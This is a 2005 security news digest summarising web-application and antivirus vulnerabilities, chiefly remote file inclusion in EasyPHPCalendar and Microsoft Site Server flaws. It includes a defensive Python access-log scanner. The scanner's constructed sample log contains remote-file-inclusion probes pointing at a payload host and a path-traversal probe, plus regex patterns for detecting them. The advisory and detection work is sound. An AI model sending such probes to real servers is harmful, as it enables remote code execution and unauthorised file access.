Network Security News – Wednesday, July 06, 2005 Events
EasyPHPCalendar header.inc.php serverPath Variable Remote File Inclusion
EasyPHPCalendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the header.inc.php script not properly sanitizing user input supplied to the "serverPath" parameter before it is used to include files. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script. Successful exploitation requires that "register_globals" is enabled (pulling the include from a remote host additionally depends on PHP's allow_url_fopen setting permitting URL includes). Read more at osvdb.org/17732
EasyPHPCalendar datePicker.php serverPath Variable Remote File Inclusion
EasyPHPCalendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /events/datePicker.php script not properly sanitizing user input supplied to the "serverPath" parameter before it is used to include files. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script. Successful exploitation requires that "register_globals" is enabled. Read more at osvdb.org/17733
EasyPHPCalendar setupSQL.php serverPath Variable Remote File Inclusion
EasyPHPCalendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /setup/setupSQL.php script not properly sanitizing user input supplied to the "serverPath" parameter before it is used to include files. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script. Successful exploitation requires that "register_globals" is enabled. Read more at osvdb.org/17734
EasyPHPCalendar popup.php serverPath Variable Remote File Inclusion
EasyPHPCalendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /functions/popup.php script not properly sanitizing user input supplied to the "serverPath" parameter before it is used to include files. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script. Successful exploitation requires that "register_globals" is enabled. Read more at osvdb.org/17731
EasyPHPCalendar calendar.php serverPath Variable Remote File Inclusion
EasyPHPCalendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the calendar.php script not properly sanitizing user input supplied to the "serverPath" parameter before it is used to include files. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script. Successful exploitation requires that "register_globals" is enabled. Read more at osvdb.org/17723
Clam AntiVirus Zero Length Cabinet File ENSURE_BITS() Macro DoS
ClamAV contains a flaw that may allow a remote denial of service. The issue is triggered when the ENSURE_BITS() macro in libclamav/mspack/mszipd.c fails to properly validate its input. A remote attacker could send a specially crafted CAB file with cffile_FolderOffset set to 0xff to cause the program to enter an infinite loop, resulting in a loss of availability of the anti-virus system. Read more at osvdb.org/17645
Comdev eCommerce index.php Review Field XSS
Comdev eCommerce contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate input passed to the 'Add Your Review' section of the 'index.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary script in a victim's browser within the trust relationship between the browser and the server, leading to a loss of integrity. Read more at osvdb.org/17675
Microsoft Site Server remind.asp Information Disclosure
Microsoft Site Server contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when using the 'LDAP_Anonymous' account and accessing the 'remind.asp' script, which will disclose the password reminder for any LDAP user, resulting in a loss of confidentiality. While not considered critical, this information can lead to more focused and precise attacks. Read more at osvdb.org/17664
Microsoft Site Server LDAP_Anonymous Account Plaintext Password Disclosure
Microsoft Site Server contains a flaw that may lead to an unauthorized password exposure. It is possible to gain access to plaintext passwords when using the 'LDAP_Anonymous' account, which may lead to a loss of confidentiality. Read more at osvdb.org/17667
Microsoft Site Server cphost.dll Arbitrary Code Execution
Microsoft Site Server contains a flaw that may allow a remote attacker to execute arbitrary ASP code. The issue is due to 'cphost.dll' not properly sanitizing user input, specifically directory-traversal sequences (..). By supplying a specially crafted filename in the disposition parameter, a remote attacker can execute arbitrary ASP code, resulting in a loss of integrity. Read more at osvdb.org/17669
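Added example, not code from EasyPHPCalendar, Microsoft Site Server, OSVDB or this digest: a small Python access-log scanner that flags the two request shapes behind the entries above, an include-path parameter such as "serverPath" carrying a remote URL (the EasyPHPCalendar RFI entries) and a filename parameter carrying ".." traversal (the cphost.dll entry). The log lines, client and payload IPs, script paths and the 'filename' parameter name are constructed for the example; the detector flags the probe itself, so it fires whether or not the target host actually had register_globals on.

```python
"""Flag remote-file-inclusion and path-traversal probes in web access logs.

Sample log lines below are constructed for this example; they are not real
traffic and the hosts in them are documentation addresses.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl, unquote

# Common/combined log format; only client IP, request target and status are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# A query value that is itself a URL is the signature of an RFI probe against
# an include()-style parameter such as serverPath.
REMOTE_URL = re.compile(r'^(https?|ftps?)://', re.IGNORECASE)
# Dot-dot segments in either separator style, checked after decoding.
TRAVERSAL = re.compile(r'(^|[\\/])\.\.([\\/]|$)')


def classify_value(value):
    """Return 'rfi', 'traversal' or None for one query value.

    parse_qsl has already percent-decoded the value once; decoding again
    catches double-encoded payloads such as %252e%252e%252f (../).
    """
    decoded = unquote(value)
    if REMOTE_URL.match(decoded):
        return "rfi"
    if TRAVERSAL.search(decoded):
        return "traversal"
    return None


def scan_line(line):
    """Return a list of findings for one access-log line (empty if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    target = urlsplit(m.group("target"))
    findings = []
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        kind = classify_value(value)
        if kind is None:
            continue
        findings.append({
            "ip": m.group("ip"),
            "script": target.path,
            "param": name,
            "kind": kind,
            "value": value,
            # A trailing '?' or an embedded NUL in an RFI payload is meant to
            # neutralise whatever the vulnerable script appends to the prefix.
            "truncates_suffix": value.endswith("?") or "\x00" in value,
        })
    return findings


def scan_log(text):
    """Scan every line of a log and return all findings in order."""
    findings = []
    for line in text.splitlines():
        findings.extend(scan_line(line))
    return findings


def summarize(findings):
    """Count findings per (source IP, kind) so repeated probing stands out."""
    counts = defaultdict(int)
    for f in findings:
        counts[(f["ip"], f["kind"])] += 1
    return dict(counts)


# Constructed sample: two RFI probes (plain and percent-encoded) against the
# serverPath parameter, one benign calendar request, one traversal probe using
# a hypothetical 'filename' parameter.
SAMPLE_LOG = """\
203.0.113.7 - - [06/Jul/2005:10:01:12 +0000] "GET /calendar/header.inc.php?serverPath=http://198.51.100.9/s.txt? HTTP/1.0" 200 512
203.0.113.7 - - [06/Jul/2005:10:01:15 +0000] "GET /calendar/events/datePicker.php?serverPath=http%3A%2F%2F198.51.100.9%2Fs.txt%3F HTTP/1.0" 200 512
198.51.100.22 - - [06/Jul/2005:10:02:40 +0000] "GET /calendar/calendar.php?month=7&year=2005 HTTP/1.1" 200 4096
192.0.2.11 - - [06/Jul/2005:10:03:01 +0000] "POST /scripts/cphost.dll?filename=..%2F..%2Fupload.asp HTTP/1.1" 200 0
"""

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ip"]} {h["kind"]:<9} {h["script"]} {h["param"]}={h["value"]!r}')
    print(summarize(hits))
```

The scanner keys on the parameter value rather than on a list of known-vulnerable script names, so a new RFI target (another script that includes from a request-controlled path) is caught without a signature update; a 200 status on a flagged line is the prompt to check whether the include actually fetched the remote file.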
Vuln: Adobe Reader For Unix Remote Buffer Overflow Vulnerability
Read more at securityfocus.com/bid/14153
Vuln: MyGuestbook Form.Inc.PHP3 Remote File Include Vulnerability
Read more at securityfocus.com/bid/14155
Vuln: AutoIndex PHP Script Index.PHP Cross-Site Scripting Vulnerability
Read more at securityfocus.com/bid/14154
Vuln: Covide Groupware-CRM Unspecified SQL Injection Vulnerability
Read more at securityfocus.com/bid/14156
Re: [badroot security] AutoIndex PHP Script: XSS vulnerability
Read more at securityfocus.com/archive/1/404291
[badroot security] probe.cgi: Remote Command Execution
Read more at securityfocus.com/archive/1/404294
iDEFENSE Security Advisory 07.05.05: Adobe Acrobat Reader UnixAppOpenFilePerform() Buffer Overflow Vulnerability
Read more at securityfocus.com/archive/1/404289
MyGuestbook Remote File Inclusion
Read more at securityfocus.com/archive/1/404297